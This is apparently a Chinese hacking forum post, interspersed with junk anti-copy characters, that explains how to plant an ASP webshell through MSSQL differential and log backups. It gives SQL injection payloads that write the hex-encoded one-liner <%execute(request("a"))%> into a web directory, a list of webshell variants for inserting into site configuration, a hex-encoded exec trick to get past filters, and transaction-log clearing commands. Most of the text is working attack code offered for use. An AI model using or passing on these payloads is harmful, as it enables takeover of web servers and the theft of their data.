MSsql差异备份总结

admin

差异备份的流程大概这样：
6 B6 t! @& r/ E. X" c' o  K* ~1.完整备份一次(保存位置当然可以改)
, |; w' I! z& u; J. }  r9 u! Vbackup database 库名 to disk = 'c:\ddd.bak';--
' {2 q% a  l4 \7 }8 Q' `
. t% K: S6 P' k6 W2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
; ~, p& d) W$ m, t1 i
3.进行差异备份
$ [0 `+ ]1 J! Q* w- J, Y# H8 B2 Ebackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
5 ]6 Q( S2 z- V" F
9 m$ c* U6 A/ H$ M. J如下是网上常见的差异备份代码，思路一样！
( l- @9 c# g* T: j  N===================================================
# C7 V- z  p2 R! C* ~# D2 [, O利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

7 w4 \- V4 y" U: [; ^; ]; l, cdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

# v& Z6 V( `+ ^8 ?declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
/ Q% R+ A# ^1 M3 E' y
2 p" Z& p- k$ j( c8 y/ a2 D' A: _drop table [xiaolu]  -- 删除此表。
; b* i7 _, p! L/ Z2 T7 f
0x77006F006B0061006F002E00620061006B00为wokao.bak
. P2 O5 F0 H/ F$ \; [  Z) S0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
. C$ j4 I5 v* r( w) s2 |0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
0 _! u, C  k7 p* i" K7 F+ ~
3 d$ m/ k9 n: G# u3 O) \声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================
) N# y3 j. P2 L
我发现上面代码，有时会无效，而直接用

, U3 F( D- H7 J0 \/ A2 `; t* T* Zbackup database 库名 to disk = 'c:\ddd.bak'
) V+ Z; V. |! Q* ]7 k8 F: u
create table [dbo].[dtest] ([cmd] [image]);
8 C+ ?. w' D4 ~7 [( O/ n" V4 x. E
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
, A! Y; f' `& v& k0 y
网上还有log增量备份的，我也把他记录一下
=====================================================
另一种log增量备份技术:
# j9 d5 m8 \8 i
';alter database null set RECOVERY FULL--
- L+ b& g2 M8 }+ I5 T4 Y
( {, t5 ~# d% b6 c';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. b. ~8 ?* [- G" D0 [  R
';backup log null to disk = '备份路径'--

! ]$ f0 l9 C& K# [';drop table cmd--
, g# ^. }$ Z; z4 ?8 m: z: ~' J
';alter database XXX set RECOVERY SIMPLE--
+ v& X/ }& Z5 i) A& i
  Q; A0 E. {7 p# `& O/ KPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
$ B9 K# v& K+ V$ o# @: W6 y3 D
2 B0 u/ o, l+ V) ]) c) M说到一句话马，还可以有这么几种写法：

8 Q% s& p. }' j$ m% A% z9 t: `a)<%%25Execute(request("a"))%%25>
3 B3 \+ ?' q7 e+ Q4 a5 Y+ rb)<%Execute(request("a"))%>
; h. j& W5 m4 n2 C6 Ac)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
1 p/ c% N3 k, b  [, `! ?h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
5 r2 J, L1 p2 Z" II)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================

当遇到差备过滤了/时用这个语句代替
7 ^9 B  A. O! {. n+ Y
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

$ i; f0 _' v: B: `% T$ |8 Y( R把要执行的语句转16进制然后用exec执行
  B7 |& |' R+ b2 ~! A8 }1 I

# f) Z- z8 X. k! b" Q减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1 Y) A- F; h- u& L, ?8 G  |1
: }! P, |, G+ \0 ^' m4 ]. `id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
  {" F( f3 [9 `2 J. d8 q9 y6 Z2
id=1;backup database model to disk='你的路径‘ with differential,format;--

. V" I, O5 x$ X% y1 S" N

* N8 F2 o+ I6 x/ q6 qSQL语句清理日志
注：test为数据库名

--清空日志
7 Y5 m5 w/ K+ @; V7 f1 _DUMP TRANSACTION test WITH NO_LOG
- e& h+ n3 r- Y
; u$ a* {  n& c$ K--截断事务日志
2 j& m+ Q- a3 S* B/ c( ~- iBACKUP LOG test WITH NO_LOG
! I& b8 I. o& v6 A' {- s7 T
--收缩数据库
9 \6 I- ^4 D, G- l+ E$ O5 @DBCC SHRINKDATABASE(test)
0 l4 S! R, C! S2 D# K
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
; o2 b9 r) S0 M# Y( D. N
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'